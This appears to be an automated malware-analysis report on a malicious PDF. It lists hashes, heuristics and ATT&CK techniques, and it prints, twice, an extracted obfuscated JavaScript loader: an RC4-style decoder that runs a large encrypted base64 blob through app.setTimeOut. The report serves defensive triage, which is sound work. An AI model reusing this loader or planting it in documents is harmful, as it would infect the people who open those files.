PDF malware analysis — malicious · 78285fc3b08c49f2

MALICIOUS

PDF

5.1 KB Created: 2009-02-13 04:13:07 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12)

MD5: eb06c63df6ffdf888499548cb12c580d SHA-1: eec6feace11076881afb910968f80fafe045051f SHA-256: 78285fc3b08c49f227f556c68abfbabbc4abfc77659245e00a1535856511ec5f

116 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

This PDF file contains embedded JavaScript that is heavily obfuscated, indicating a malicious intent to exploit vulnerabilities. The ML classifier and heuristic firings strongly suggest this is a malicious PDF. The JavaScript likely attempts to download and execute a secondary payload, a common technique for malware delivery.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 4

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0013_000.js
c40243689f8fa3dd6ef023eb78a1b8a668b8c6b76b606c9046586b8de5570d49 pdf-javascript-stream PDF /JS object 13 at offset 0x3CE 5545 bytes

Filename	Kind	Source	Size
`javascript_obj0013_000.js` `c40243689f8fa3dd6ef023eb78a1b8a668b8c6b76b606c9046586b8de5570d49`	pdf-javascript-stream	PDF /JS object 13 at offset 0x3CE	5545 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script function selikurubi7(bisadotan,nipidame7){var vonetitod=[],lefam2,boruvov=0,libulofap,bivemil='',kuvel;for(lefam2=0;lefam2<256;lefam2++){vonetitod[lefam2]=lefam2;}for(lefam2=0;lefam2<256;lefam2++){boruvov=(boruvov+vonetitod[lefam2]+bisadotan.charCodeAt(lefam2%bisadotan.length))%256;libulofap=vonetitod[lefam2];vonetitod[lefam2]=vonetitod[boruvov];vonetitod[boruvov]=libulofap;}lefam2=0;boruvov=0;for(kuvel=0;kuvel<nipidame7.length;kuvel++){lefam2=(lefam2+1)%256;boruvov=(boruvov+vonetitod[lefam2])%256;libulofap=vonetitod[lefam2];vonetitod[lefam2]=vonetitod[boruvov];vonetitod[boruvov]=libulofap;bivemil+=vekimobod(nipidame7.charCodeAt(kuvel)^vonetitod[(vonetitod[lefam2]+vonetitod[boruvov])%256]);}return bivemil;}function vekimobod(puvokuveru7){return String.fromCharCode(puvokuveru7)}function pufipesipa(dapukudafe,kakakivaki){return kakakivaki?(vekimobod(dapukudafe++)+pufipesipa(dapukudafe,--kakakivaki)):''}function mupofi1(){return pufipesipa(65,26)+pufipesipa(97,26)+pufipesipa(48,10)+'+'+vekimobod(47)+'='}var depabam7=mupofi1(),movosom=app.setTimeOut(selikurubi7(bopud("SVNzODRqbkttaXNXTXdrVTVnSkU3blA3TVFKZzA="),bopud("06cBNTCaDRE0F6VRlnIBeRqnMDsL72+bDYfEMIyi6U7kFRo6Jjl2CA3L6tk10yYjCn7PujrdzAx2xfUX+UFgWIeSfGLrh3s0sUUVAei7mbRR3ZAzIJ+RZGMkhimbAE6KQh4Pr/YzmT5VVHOES/PHN7HvrwGOYPwtf9chp0fGhubCcP6iS97fDvgJPTujtfqJEFXvN6P58FLBgC3NQ0Lk1Q7612dIXT5y2aHaEpqMimIY2XBDnEWv/+Fqkkqu2A5CIDrTvyfB2l3KlD3905fpAy4231IKO1mVR7vdxVoP5q4kQhpP1/94IDDJufDUaK4n2itsyBy0BWlmLHCy44mLGQ7NH0ZXR74VyYOcCzZ2Z+JZPOzDVxE9Nn1c1xZrjXFsLXTRyvFnaEfy355Cz9hBTBcVX6qGPn+fgZvyAyXGsEepsAeNuVGRqRPx9PDo09dwPO80/NigiSV3AKgf0YFMGu0nUxKpCwjAnIAhZce4NAC5xJOsPp+f06OwhQ+wXWIVV3y8IJBNCi4yo3G0RR46Kx3oWqIwGBiI0pRSHM8nS1lEQ8IV1Oma8ZaN08hkW9w/OWlx3yE19+aNdF618dmqiU+X/UhwMofICD4ADeHR8mpl59sGu7DhclLH89APzCfxkfUTCrwKw93RRak74AR0xfEbJeRT2pfNCX4+EPiIVh77SOv0R50C7dEbDLLmiBSRwNm/b9EoX7OLkTPPw1CyGpTbtoRZeoAdTXKEcgJ8pfH7KSFth1bLb+LrzrDWCWC97132G/1NBkPXnbhieQOFrYgNu9ScUGBrh4HK0xWDxXueOwS6orE/Q3VdhrjdZnzyElA5r/9FqYyk437RbujeWz2OxNaIamQHijZBwW4v/VI8d19NTU0AhCsjE3jWIFodoYj3pz5mwo1nje9/BFrr1T6c221kfiBzN32WUXATfYOQ0bJtyTY5Ipq4vnnawj0MiBeFJ7FQVfvCDCo6WB2NL/DKCR7dwMHqJK0WNx9Fs6e62iMN7Gh76yqNrLdQBcGdVFVkNd5Bo5oHXkU/KgGCnXnKlds3bmAGe1IsZZu9gcLA++mUAS5cM3DO/rpCqe7ye962m8Rfy4NrcFcKoY0DEWTZ09C1i16+3/+iehXXUr5EATj/qglBkj1MEIe98qDjBbLj6pRiynnKHvvQquRBRGGFK9hoTrJ2Z7I+hxeB1RpYSbWpEpl1VsgS/33QYCDbpqaR2y2ycQgBd2mlVxevqhEWFp5DCrNaL+5btNJGGOxIvB+U5/RIwS2cLmVtgthQQ21oXj4niBJdN88sMLe+l3wDQAO07bEX67eo9N4FCHdy33uClqiusYGMxH44vQgQkk+kUE57z8le4Pzv4Hd7YUkLgb3kkF1uh+8c8YwlcNS0LnY2KctCsKvwrYeR9yQziwaXbLDsHHCMWdVRTwwDEmyHqo9RthcG5dalUTQvCvMmshhQvDeRr3uDfaa2d/G7oxkwd0cqVVytNF7109Kq9ePNhobC2lpvs9Wd1frha4CpDeyPtuyWDeAq6n7/Eb+IwKricH1tQ4Avro9NJ+T68q6+NmiQNN3ALVgDCrh4saOf9HEr+P78sK6BCr6bx93ldDyOtzi3fF8z63wwyCv7E3Uq5un/2vfjARgwzIwPdm0qri8ShXX/bQmaqwElac1r5bcFfs/VACVWvhPhbkmOB0o6ahDOsK9JOUsJ6NXxF+lOlgREc2x57o2AiEFeMg/JZrh8wGUTAPFnNUiDv2y/zBh7IXpv/bjl1+LBVu/cy8NwYKH+UgmKpLjGG2ySi8MR24Lz9Cqed9IcP5tKAGimMLm0KgES0rRfHbyMVfNFEmDT6lZpQ5b7apn+0fLeWbAbLlZ9Gu9NtNikMamD1biPZVgFZf4DJpPlC3iSARFP8W/CWK16P0fAzABiLnir68j+BHPW745z0ynkzA54ZQ/ODT1rwldu3CgwS7fJK22c8yM0QbogPsDcvwvJk39YVdRLL2xU8WBknlvCWx2BCkJBNYwzCQk0ALPsMJ4JhmlozZZngWaJqZRLyDvLefUS4PfFm9WNxOpOj9mb/4atVLBVO7c9wOm/hUQI7uFB5HytUuzNvXbqTYlXROPc7kpUC3oRXmvEPuWedo+MP/wKKZc1WD6OISGIMwzCcMVDTc0SeK2pf2pRf0hLjYmklOlhMJbNWdfm/6TXGG5taf3rWRZgAiGvvl0+gCwEqWLW1X2+i+LVwAWCl0rfQ62f3Vcnm0rMr8fSSW2uqMa5UW6CANtipX0+4LjXKz0Ygw4Ul4mwCOEds7tH5ZQzUv/PJhhtnYrazccb5koC8+mLMgrqzh1JLxeeWdAXgpzYPV7aZejhVNDSIW9DlexGY0Y5yG+WVh63iEzOjkSAljkgejH3ZTk/EOnr78nrvweiYqbR+VqfPeW1csOzZAjlviwqc2MAZKmpjmAOKXYHdscKKtKrnF8xQrpaS/KfPp8MHDI5Tp2wH0d5Bd6/WxSD5FihV3IDJTykCCmMb1RoJcADpnY3AH7xp1BLDFSB3Yd/imUN7USXQejdWAjeRlM3LPqVNzAoDpZcCPnro8YjrjlijhKUz5dBM+2fn2/7mWDDE2RYkuK2QGnmFuZfXN2lFpU/9cake7duVVXWJr/CH0Vo5+W4B5REFiEjFFnQgtbGWA/khHYB+hXP+IQSD2Z8XRVQ1OAqBk+S9+34qZ+fJGAOjfqOifPubpFmjMHYuyjGG8stqZ2NVtQl/ioneKgD0stRPaOc6oK4wAYf5bQF2vuoBYI5N7k1aX6PgwBJuipHxlkXxdo+hVUzpOZdsKa/5J9ieQyJ3a873MCaZnoz1y/8/vkN4HdDX5o5nuta7PPz+XZ6Jjoq/AJzlFA3v667oZRm081Xmyct/fO8bUEEXebl5h7if/DHDB78YvePhj8ooRZ1uetc/Qn210gORsveNvmK2BceXqXbBJ+zXwq0esyFcrKcZAlF7 ... (truncated)

Detection

ClamAV: No threats found

Obfuscation or payload: likely

Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).

Preview script

First 1,000 lines of the extracted script

function selikurubi7(bisadotan,nipidame7){var vonetitod=[],lefam2,boruvov=0,libulofap,bivemil='',kuvel;for(lefam2=0;lefam2<256;lefam2++){vonetitod[lefam2]=lefam2;}for(lefam2=0;lefam2<256;lefam2++){boruvov=(boruvov+vonetitod[lefam2]+bisadotan.charCodeAt(lefam2%bisadotan.length))%256;libulofap=vonetitod[lefam2];vonetitod[lefam2]=vonetitod[boruvov];vonetitod[boruvov]=libulofap;}lefam2=0;boruvov=0;for(kuvel=0;kuvel<nipidame7.length;kuvel++){lefam2=(lefam2+1)%256;boruvov=(boruvov+vonetitod[lefam2])%256;libulofap=vonetitod[lefam2];vonetitod[lefam2]=vonetitod[boruvov];vonetitod[boruvov]=libulofap;bivemil+=vekimobod(nipidame7.charCodeAt(kuvel)^vonetitod[(vonetitod[lefam2]+vonetitod[boruvov])%256]);}return bivemil;}function vekimobod(puvokuveru7){return String.fromCharCode(puvokuveru7)}function pufipesipa(dapukudafe,kakakivaki){return kakakivaki?(vekimobod(dapukudafe++)+pufipesipa(dapukudafe,--kakakivaki)):''}function mupofi1(){return pufipesipa(65,26)+pufipesipa(97,26)+pufipesipa(48,10)+'+'+vekimobod(47)+'='}var depabam7=mupofi1(),movosom=app.setTimeOut(selikurubi7(bopud("SVNzODRqbkttaXNXTXdrVTVnSkU3blA3TVFKZzA="),bopud("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
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.